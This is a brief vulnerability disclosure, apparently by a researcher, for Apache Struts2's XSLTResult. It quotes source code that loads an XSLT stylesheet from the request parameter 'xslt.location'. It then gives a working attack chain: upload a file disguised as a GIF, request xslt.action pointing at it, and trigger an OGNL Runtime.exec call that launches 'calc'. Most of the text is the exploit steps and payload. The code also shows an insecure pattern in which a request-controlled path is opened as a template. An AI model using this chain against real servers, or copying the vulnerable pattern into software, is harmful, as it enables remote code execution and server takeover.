the file:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));
A use of the action of xsltResult:
An attacker can upload a file:
/upload/7758521.gif
hacked by kxlzx
http://www.inbreak.net
open url
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
then struts2 will execute
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')